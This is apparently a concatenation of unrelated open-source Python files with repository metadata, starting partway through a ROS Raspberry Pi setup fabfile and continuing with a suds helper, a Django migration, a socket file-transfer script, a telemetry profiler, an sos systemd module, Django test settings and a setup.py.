. ~/ros2_ws/install/local_setup.bash (or setup.bash)
ros2 run demo_nodes_cpp talker
ros2 run demo_nodes_py listener
"""
global WS_DIR
global INSTALL_DIR
run("echo 'Roughly following http://wiki.ros.org/ROSberryPi/Installing%20ROS%20Kinetic%20on%20the%20Raspberry%20Pi'")
_fp("Set up / compile ROS on Rasbian Jessie Lite 2016-05-27")
_pp("* If you need to do raspi-config stuff, CTRL-C out and do that before running this script")
# Setup ROS Repositories
if not fabfiles.exists("/etc/apt/sources.list.d/ros-latest.list"):
# Raspbian Stretch does not have dirmngr installed by default. This
# is needed for apt-key
sudo("apt-get update")
sudo("apt-get -y install dirmngr")
sudo("sh -c 'echo \"deb http://packages.ros.org/ros/ubuntu $(lsb_release -sc) main\" > /etc/apt/sources.list.d/ros-latest.list'")
sudo("sudo apt-key adv --keyserver hkp://ha.pool.sks-keyservers.net:80 --recv-key 421C365BD9FF1F717815A3895523BAEEB01FA116") #apt-key adv --keyserver hkp://ha.pool.sks-keyservers.net:80 --recv-key 0xB01FA116")
sudo("apt-get update")
sudo("apt-get -y upgrade")
else:
_fp("ros-lastest.list already exists... skipping set up")
sudo("apt-get update")
sudo("apt-get -y upgrade")
# Install Bootstrap Dependencies
sudo("apt-get install -y python-rosdep python-rosinstall-generator python-wstool python-rosinstall build-essential cmake")
# Initializing rosdep
if not fabfiles.exists("/etc/ros/rosdep/sources.list.d/20-default.list"):
sudo("rosdep init")
run("rosdep update")
home_path = run("pwd")
ws_dir = home_path + WS_DIR
# Create catkin workspace
if not fabfiles.exists(ws_dir):
run("mkdir -p " + ws_dir)
# Compile
with cd(ws_dir):
if not fabfiles.exists("kinetic-ros_comm-wet.rosinstall"):
run("rosinstall_generator ros_comm --rosdistro kinetic --deps --wet-only --tar > kinetic-ros_comm-wet.rosinstall")
if not fabfiles.exists("src"):
_fp("The following wstool downloads the source code needed")
_pp("If wstool init fails or is interrupted, you can resume the download by running:\n wstool update -j 2 -t src\n BTW, the -j 2 option downloads 2 packages in parallel")
run("wstool init -j 2 src kinetic-ros_comm-wet.rosinstall")
else:
_pp("Looks like you had already tried 'wstool init...', so continuing with 'wstool update...'")
run("wstool update --delete-changed-uris -j 2 -t src")
rval = _get_input("Did wstool download everything ok?\n(NO to quit & resolve, ENTER to continue)")
if rval == "NO":
return
# Resolve dependencies
run("rosdep install -y --from-paths src --ignore-src --rosdistro kinetic -r --os=debian:jessie")
install_dir = home_path + INSTALL_DIR
_fp("All dependencies have been resolved, going to start compiling and install into: " + install_dir)
if not fabfiles.exists(install_dir):
run("mkdir -p " + install_dir)
rval = _get_input("Continue with compile or skip? SKIP to skip compile, ENTER to continue...")
if rval != "SKIP":
run("./src/catkin/bin/catkin_make_isolated --install -DCMAKE_BUILD_TYPE=Release --install-space " + install_dir + " -j2")
_rval = _get_input("Did the compile succeed?\n(NO to quit and fix, ENTER to continue)")
if rval == "NO":
return
src_cmd = "source " + install_dir + "/setup.bash"
if run("grep '" + src_cmd + "' ~/.bashrc", warn_only=True).succeeded:
_fp("Sourcing of ROS env setup is already in your bashrc")
else:
_pp("Going to add ROS source setup into your bashrc")
run("echo '" + src_cmd + "\n' >> ~/.bashrc")
run("echo 'export ROSBOTS_MASTER=1\n' >> ~/.bashrc")
# Add some custom python library paths
run("echo 'export PYTHONPATH=/home/pi/lib/python:${PYTHONPATH}\n' >> ~/.bashrc")
# Add other setups for rosbots
put("./sourceme_rosbots.bash", "~/")
run("echo 'source ~/sourceme_rosbots.bash' >> ~/.bashrc")
# Create a separate rosbots_catkin_ws outside of core ROS
rosbots_ws_dir = home_path + "/rosbots_catkin_ws"
if not fabfiles.exists(rosbots_ws_dir):
_fp("Need to create and init rosbots catkin workspace")
run("mkdir -p " + rosbots_ws_dir + "/src")
old_shell = env.shell
env.shell = '/bin/bash -l -c -i'
with cd(rosbots_ws_dir + "/src"):
run(ws_dir + "/src/catkin/bin/catkin_init_workspace")
with cd(rosbots_ws_dir):
run(ws_dir + "/src/catkin/bin/catkin_make")
run(ws_dir + "/src/catkin/bin/catkin_make install")
env.shell = old_shell
src_cmd = "source " + rosbots_ws_dir + "/devel/setup.bash"
if run("grep '" + src_cmd + "' ~/.bashrc", warn_only=True).succeeded:
_fp("Sourcing of ROSbots catkin ws env setup.bash is already in your bashrc")
else:
_pp("Going to add ROSbots catkin ws source setup into your bashrc")
run("echo '" + src_cmd + "\n' >> ~/.bashrc")
_pp("All ROS components should be compiled and installed. Going to set up init.d to run ROSBots as a service.")
# Copy over the rosbots init script - which is kicked off by the init.d
# service framework
put("./rosbots_startup.sh", "~/rosbots_startup.sh")
run("chmod +x ~/rosbots_startup.sh")
put("./rosbots_shutdown.sh", "~/rosbots_shutdown.sh")
run("chmod +x ~/rosbots_shutdown.sh")
# Set up and install the init.d service which will fork and call
# the rosbots startup script above
put("./rosbots_service_template.bash", "~/rosbots_template")
run("cat rosbots_template | sed 's/_TEMPLATE_HOME/" + home_path.replace("/", "\/") + "/' | sed 's/_TEMPLATE_WS_PATH/" + ws_dir.replace("/", "\/") + "/' > rosbots")
run("rm rosbots_template")
sudo("mv rosbots /etc/init.d/")
sudo("chown root:root /etc/init.d/rosbots")
sudo("chmod 755 /etc/init.d/rosbots")
sudo("update-rc.d rosbots defaults")
sudo("systemctl daemon-reload")
sudo("systemctl stop rosbots")
sudo("systemctl start rosbots")
_fp("To get IP address of Pi, from a linux system - 'arp -a'")
_fp("Done...")
| ROSbots/rosbots_setup_tools | rpi_setup/fabfile.py | Python | gpl-3.0 | 34,336 | 0.006291 |
# This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# written by: Jeff Ortel ( jortel@redhat.com )
from suds import *
from suds.sax import Namespace, splitPrefix
def qualify(ref, resolvers, defns=Namespace.default):
"""
Get a reference that is I{qualified} by namespace.
@param ref: A referenced schema type name.
@type ref: str
@param resolvers: A list of objects to be used to resolve types.
@type resolvers: [L{sax.element.Element},]
@param defns: An optional target namespace used to qualify references
when no prefix is specified.
@type defns: A default namespace I{tuple: (prefix,uri)} used when ref not prefixed.
@return: A qualified reference.
@rtype: (name, namespace-uri)
"""
ns = None
p, n = splitPrefix(ref)
if p is not None:
if not isinstance(resolvers, (list, tuple)):
resolvers = (resolvers,)
for r in resolvers:
resolved = r.resolvePrefix(p)
if resolved[1] is not None:
ns = resolved
break
if ns is None:
raise Exception('prefix (%s) not resolved' % p)
else:
ns = defns
return (n, ns[1])
def isqref(object):
"""
Get whether the object is a I{qualified reference}.
@param object: An object to be tested.
@type object: I{any}
@rtype: boolean
@see: L{qualify}
"""
return (\
isinstance(object, tuple) and \
len(object) == 2 and \
isinstance(object[0], basestring) and \
isinstance(object[1], basestring))
class Filter:
def __init__(self, inclusive=False, *items):
self.inclusive = inclusive
self.items = items
def __contains__(self, x):
if self.inclusive:
result = ( x in self.items )
else:
result = ( x not in self.items )
return result
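if __name__ == '__main__':
    # Hypothetical usage sketch (not part of the original module): a stub resolver
    # stands in for a sax Element so the helpers can be exercised without a
    # parsed schema document.
    class _StubResolver:
        def resolvePrefix(self, prefix):
            # pretend the schema maps the 'tns' prefix to an example namespace
            return (prefix, 'http://example.com/schema' if prefix == 'tns' else None)

    ref = qualify('tns:Person', [_StubResolver()])
    assert ref == ('Person', 'http://example.com/schema')
    assert isqref(ref)
    # Filter is exclusive by default: listed items are treated as *not* contained.
    assert 'a' not in Filter(False, 'a', 'b')
    assert 'c' in Filter(False, 'a', 'b')
    assert 'a' in Filter(True, 'a', 'b')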
| BhallaLab/moose | moose-gui/suds/xsd/__init__.py | Python | gpl-3.0 | 2,613 | 0.004592 |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Contact'
db.create_table('storybase_user_contact', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('storybase.fields.ShortTextField')(blank=True)),
('info', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal('storybase_user', ['Contact'])
def backwards(self, orm):
# Deleting model 'Contact'
db.delete_table('storybase_user_contact')
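    # Usage note (assumes the standard South workflow; not taken from this file):
    # the migration would typically be applied with
    #     ./manage.py migrate storybase_user 0006
    # and reversed with
    #     ./manage.py migrate storybase_user 0005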
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'storybase_asset.asset': {
'Meta': {'object_name': 'Asset'},
'asset_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'asset_id': ('uuidfield.fields.UUIDField', [], {'unique': 'True', 'max_length': '32', 'blank': 'True'}),
'attribution': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'datasets': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'assets'", 'blank': 'True', 'to': "orm['storybase_asset.DataSet']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_edited': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'license': ('django.db.models.fields.CharField', [], {'default': "'CC BY-NC-SA'", 'max_length': '25'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'assets'", 'null': 'True', 'to': "orm['auth.User']"}),
'published': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'section_specific': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'source_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "u'draft'", 'max_length': '10'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '10'})
},
'storybase_asset.dataset': {
'Meta': {'object_name': 'DataSet'},
'attribution': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'dataset_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'dataset_id': ('uuidfield.fields.UUIDField', [], {'unique': 'True', 'max_length': '32', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_edited': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'datasets'", 'null': 'True', 'to': "orm['auth.User']"}),
'published': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'source': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "u'draft'", 'max_length': '10'})
},
'storybase_story.story': {
'Meta': {'object_name': 'Story'},
'assets': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'stories'", 'blank': 'True', 'to': "orm['storybase_asset.Asset']"}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'stories'", 'null': 'True', 'to': "orm['auth.User']"}),
'byline': ('django.db.models.fields.TextField', [], {}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'featured_assets': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'featured_in_stories'", 'blank': 'True', 'to': "orm['storybase_asset.Asset']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_edited': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'license': ('django.db.models.fields.CharField', [], {'default': "'CC BY-NC-SA'", 'max_length': '25'}),
'on_homepage': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'organizations': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'stories'", 'blank': 'True', 'to': "orm['storybase_user.Organization']"}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'stories'", 'blank': 'True', 'to': "orm['storybase_user.Project']"}),
'published': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'db_index': 'True', 'max_length': '50', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "u'draft'", 'max_length': '10'}),
'story_id': ('uuidfield.fields.UUIDField', [], {'unique': 'True', 'max_length': '32', 'blank': 'True'}),
'structure_type': ('django.db.models.fields.CharField', [], {'max_length': '20'})
},
'storybase_user.contact': {
'Meta': {'object_name': 'Contact'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'name': ('storybase.fields.ShortTextField', [], {'blank': 'True'})
},
'storybase_user.organization': {
'Meta': {'object_name': 'Organization'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'curated_stories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'curated_in_organizations'", 'blank': 'True', 'through': "orm['storybase_user.OrganizationStory']", 'to': "orm['storybase_story.Story']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_edited': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'organizations'", 'blank': 'True', 'to': "orm['auth.User']"}),
'organization_id': ('uuidfield.fields.UUIDField', [], {'unique': 'True', 'max_length': '32', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'db_index': 'True', 'max_length': '50', 'blank': 'True'}),
'website_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'storybase_user.organizationstory': {
'Meta': {'object_name': 'OrganizationStory'},
'added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'organization': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storybase_user.Organization']"}),
'story': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storybase_story.Story']"}),
'weight': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'storybase_user.organizationtranslation': {
'Meta': {'unique_together': "(('organization', 'language'),)", 'object_name': 'OrganizationTranslation'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'default': "'en'", 'max_length': '15'}),
'last_edited': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('storybase.fields.ShortTextField', [], {}),
'organization': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storybase_user.Organization']"}),
'translation_id': ('uuidfield.fields.UUIDField', [], {'unique': 'True', 'max_length': '32', 'blank': 'True'})
},
'storybase_user.project': {
'Meta': {'object_name': 'Project'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'curated_stories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'curated_in_projects'", 'blank': 'True', 'through': "orm['storybase_user.ProjectStory']", 'to': "orm['storybase_story.Story']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_edited': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'projects'", 'blank': 'True', 'to': "orm['auth.User']"}),
'organizations': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'projects'", 'blank': 'True', 'to': "orm['storybase_user.Organization']"}),
'project_id': ('uuidfield.fields.UUIDField', [], {'unique': 'True', 'max_length': '32', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'db_index': 'True', 'max_length': '50', 'blank': 'True'}),
'website_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'storybase_user.projectstory': {
'Meta': {'object_name': 'ProjectStory'},
'added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storybase_user.Project']"}),
'story': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storybase_story.Story']"}),
'weight': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'storybase_user.projecttranslation': {
'Meta': {'unique_together': "(('project', 'language'),)", 'object_name': 'ProjectTranslation'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'default': "'en'", 'max_length': '15'}),
'name': ('storybase.fields.ShortTextField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storybase_user.Project']"}),
'translation_id': ('uuidfield.fields.UUIDField', [], {'unique': 'True', 'max_length': '32', 'blank': 'True'})
}
}
complete_apps = ['storybase_user']
| denverfoundation/storybase | apps/storybase_user/migrations/0006_auto__add_contact.py | Python | mit | 14,929 | 0.007636 |
#!/usr/bin/env python
#Protocol:
# num_files:uint(4)
# repeat num_files times:
# filename:string
# size:uint(8)
# data:bytes(size)
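# Worked framing example (illustrative, using the helpers defined below): a
# transfer of one 3-byte file "a.txt" is laid out on the wire as
#   encodeInt(1, 4)        -> b'\x00\x00\x00\x01'    (num_files)
#   encodeString("a.txt")  -> b'a.txt\x00'           (filename, NUL-terminated)
#   encodeInt(3, 8)        -> b'\x00' * 7 + b'\x03'  (size)
#   followed by the 3 raw data bytes themselves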
import sys, socket
import os
from time import time
DEFAULT_PORT = 52423
PROGRESSBAR_WIDTH = 50
BUFSIZE = 1024*1024
CONNECTION_TIMEOUT = 3.0
RECEIVE_TIMEOUT = 5.0
if os.name == "nt":
sep = "\\"
else:
sep = '/'
def main():
if len(sys.argv)<2:
usage()
return
if sys.argv[1]=='-s' and len(sys.argv) >= 4:
try:
send()
except KeyboardInterrupt:
printError("\nAbort")
elif sys.argv[1]=='-r':
try:
recieve()
except KeyboardInterrupt:
printError("\nAbort")
else:
usage()
def printError(s):
sys.stderr.write(s+'\n')
def encodeInt(l, size):
if l > ((0x1 << (8*size))-1):
raise ValueError("Number too large: {0}".format(l))
b = bytearray(size)
i = 0
while l > 0:
b[i] = (l & 0xff)
l = l >> 8
i+=1
b.reverse()
return b
def encodeString(s):
return s+b'\x00'
def recieveInt(size, conn):
data = conn.recv(size)
b = bytearray(data)
if len(b) != size:
raise ValueError("Received invalid data")
value = 0
for i in range(0,size):
value = value << 8
value += b[i]
return value
def recieveString(conn):
s = ""
ch = ''
while True:
ch = conn.recv(1)
if ch == b'\x00':
break
s += ch
return s
def send():
port = DEFAULT_PORT
i = 2
files = []
while i < len(sys.argv): #-2
if sys.argv[i]=='-p':
if i+1 >= len(sys.argv):
printError("Expecting port after '-p'")
return
try:
port = int(sys.argv[i+1])
except ValueError:
printError("Invalid port: "+sys.argv[i+1])
return
i+=1
else:
receiver = sys.argv[i]
files = sys.argv[i+1:]
break
i+=1
num_files = 0
open_files = []
for fn in files:
try:
f = open(fn, "rb")
open_files.append((fn, f))
num_files+=1
except IOError as e:
printError("Could not open file {0}: {1}. Skipping".format(fn, e.strerror))
if num_files == 0:
printError("No files to send. Aborting")
return
try:
client = socket.create_connection((receiver, port), CONNECTION_TIMEOUT)
except Exception as e:
message = str(e)
if hasattr(e, 'strerror'):
message = e.strerror
printError("Could not connect to {0}: {1}".format(receiver, message))
return
print("--- Sending {0} file(s) to {1} ---".format(num_files, receiver))
metadata = bytearray()
metadata += encodeInt(num_files, 4)
for (fn, f) in open_files:
metadata += encodeString(fn[fn.rfind(sep)+1:])
f.seek(0,2)
size = f.tell()
print("- Sending {0} ({1} bytes)".format(fn, size))
metadata += encodeInt(size, 8)
client.sendall(metadata)
metadata = bytearray()
f.seek(0,0)
while size > 0:
bytebuf = bytearray(f.read(BUFSIZE))
client.sendall(bytebuf)
size -= BUFSIZE
f.close()
client.close()
def recieve():
port = DEFAULT_PORT
i = 2
while i < len(sys.argv):
if sys.argv[i]=='-p':
if i+1 >= len(sys.argv):
printError("Expecting port after '-p'")
return
try:
port = int(sys.argv[i+1])
except ValueError:
printError("Invalid port: "+sys.argv[i+1])
return
i+=1
else:
printError("Unrecognized argument: "+sys.argv[i])
return
i+=1
try:
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(('', port))
except Exception as e:
printError("Could not bind socket: {0}".format(e.strerror))
return
print("Waiting for incoming connections...")
server.listen(1)
conn, addr = server.accept()
print("Connected to {0}".format(addr[0]))
num_files = recieveInt(4, conn)
print("Recieving {0} file(s)".format(num_files))
if num_files > (0x1 << 16):
printError("Too many files. Aborting")
return
try:
for i in range(0,num_files):
fn = recieveString(conn)
filesize = recieveInt(8, conn)
print("- {0} ({1} bytes)".format(fn, filesize))
if os.path.isfile(fn):
print(" Error: file '{0}' already exists. Skipping".format(fn))
conn.recv(filesize)
continue
f = open(fn, "wb")
size = filesize
printProgressBar(0)
lastreceivetime = time()
printProgressBar(0)
while size > 0:
buffersize = min(BUFSIZE, size)
data = conn.recv(buffersize)
if len(data) == 0:
if time()-lastreceivetime > RECEIVE_TIMEOUT:
printError("\nReceive timeout. Aborting")
server.close()
return
continue
lastreceivetime = time()
size -= len(data)
f.write(data)
ratio = float(filesize-size)/float(filesize)
printProgressBar(ratio)
printProgressBar(1)
print("")
f.close()
except ValueError:
printError("Protocol error. Aborting")
finally:
server.close()
def printProgressBar(ratio):
if ratio < 0 or ratio > 1:
raise ValueError("Error: invalid ratio: {0}".format(ratio))
progressbar_length = int(ratio * PROGRESSBAR_WIDTH)
progressbar = '#'*progressbar_length + ' '*(PROGRESSBAR_WIDTH-progressbar_length) + " - {0:.2f}%".format(ratio*100.0)
sys.stdout.write("\r"+progressbar)
sys.stdout.flush()
def usage():
print("Usage:\n"
"\t{0} -s [-p port] [receiver] [files...]\t- Send files to receiver\n"
"\t{0} -r [-p port]\t\t\t\t- Receive files"
.format(sys.argv[0][sys.argv[0].rfind(sep)+1:]))
if __name__ == "__main__":
main()
| lorian1333/netcopy | netcopy.py | Python | mit | 5,187 | 0.04492 |
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import subprocess
from telemetry.core.platform import profiler
from telemetry.core import util
from telemetry.internal.backends.chrome import android_browser_finder
class AndroidScreenRecordingProfiler(profiler.Profiler):
"""Captures a screen recording on Android."""
def __init__(self, browser_backend, platform_backend, output_path, state):
super(AndroidScreenRecordingProfiler, self).__init__(
browser_backend, platform_backend, output_path, state)
self._output_path = output_path + '.mp4'
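    # The recorder process runs until CollectProfile() writes a newline to its stdin.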
self._recorder = subprocess.Popen(
[os.path.join(util.GetChromiumSrcDir(), 'build', 'android',
'screenshot.py'),
'--video',
'--file', self._output_path,
'--device', browser_backend.adb.device_serial()],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
@classmethod
def name(cls):
return 'android-screen-recorder'
@classmethod
def is_supported(cls, browser_type):
if browser_type == 'any':
return android_browser_finder.CanFindAvailableBrowsers()
return browser_type.startswith('android')
def CollectProfile(self):
self._recorder.communicate(input='\n')
    print('Screen recording saved as %s' % self._output_path)
    print('To view, open in Chrome or a video player')
return [self._output_path]
|
SaschaMester/delicium
|
tools/telemetry/telemetry/core/platform/profiler/android_screen_recorder_profiler.py
|
Python
|
bsd-3-clause
| 1,492 | 0.005362 |
# Copyright (C) 2020 Red Hat, Inc., Jake Hunsaker <jhunsake@redhat.com>
# This file is part of the sos project: https://github.com/sosreport/sos
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# version 2 of the GNU General Public License.
#
# See the LICENSE file in the source distribution for further information.
from sos.policies.init_systems import InitSystem
from sos.utilities import shell_out
class SystemdInit(InitSystem):
"""InitSystem abstraction for SystemD systems"""
def __init__(self):
super(SystemdInit, self).__init__(
init_cmd='systemctl',
list_cmd='list-unit-files --type=service',
query_cmd='status'
)
self.load_all_services()
def parse_query(self, output):
for line in output.splitlines():
if line.strip().startswith('Active:'):
return line.split()[1]
return 'unknown'
def load_all_services(self):
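        # Skip the header line; each remaining line is '<name>.service <state>'.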
svcs = shell_out(self.list_cmd).splitlines()[1:]
for line in svcs:
try:
name = line.split('.service')[0]
config = line.split()[1]
self.services[name] = {
'name': name,
'config': config
}
except IndexError:
pass
def is_running(self, name):
svc = self.get_service_status(name)
return svc['status'] == 'active'
# vim: set et ts=4 sw=4 :
|
TurboTurtle/sos
|
sos/policies/init_systems/systemd.py
|
Python
|
gpl-2.0
| 1,563 | 0 |
# coding: utf-8
from app.settings.dist import *
try:
from app.settings.local import *
except ImportError:
pass
from app.settings.messages import *
from app.settings.dist import INSTALLED_APPS
DEBUG = True
DEV_SERVER = True
USER_FILES_LIMIT = 1.2 * 1024 * 1024
SEND_MESSAGES = False
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': '_test.sqlite',
},
}
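# Work on a mutable copy of INSTALLED_APPS so apps not needed for the test run can be stripped below.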
INSTALLED_APPS = list(INSTALLED_APPS)
removable = ['south', ]
for app in removable:
if app in INSTALLED_APPS:
INSTALLED_APPS.remove(app)
TEST_DATABASE_NAME = DATABASES['default']['NAME'] if \
DATABASES['default']['NAME'].startswith('test_') else \
'test_' + DATABASES['default']['NAME']
|
tarvitz/djtp
|
app/settings/test.py
|
Python
|
bsd-3-clause
| 721 | 0.001387 |
"""
Shopify Trois
---------------
Shopify API for Python 3
"""
from setuptools import setup
setup(
name='shopify-trois',
version='1.1-dev',
url='http://masom.github.io/shopify-trois',
license='MIT',
author='Martin Samson',
author_email='pyrolian@gmail.com',
maintainer='Martin Samson',
maintainer_email='pyrolian@gmail.com',
description='Shopify API for Python 3',
long_description=__doc__,
packages=[
'shopify_trois', 'shopify_trois.models', 'shopify_trois.engines',
'shopify_trois.engines.http'
],
zip_safe=False,
include_package_data=True,
platforms='any',
install_requires=[
'requests>=1.2.3'
],
test_suite='nose.collector',
tests_require=[
'pytest', 'nose', 'mock'
],
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules'
]
)
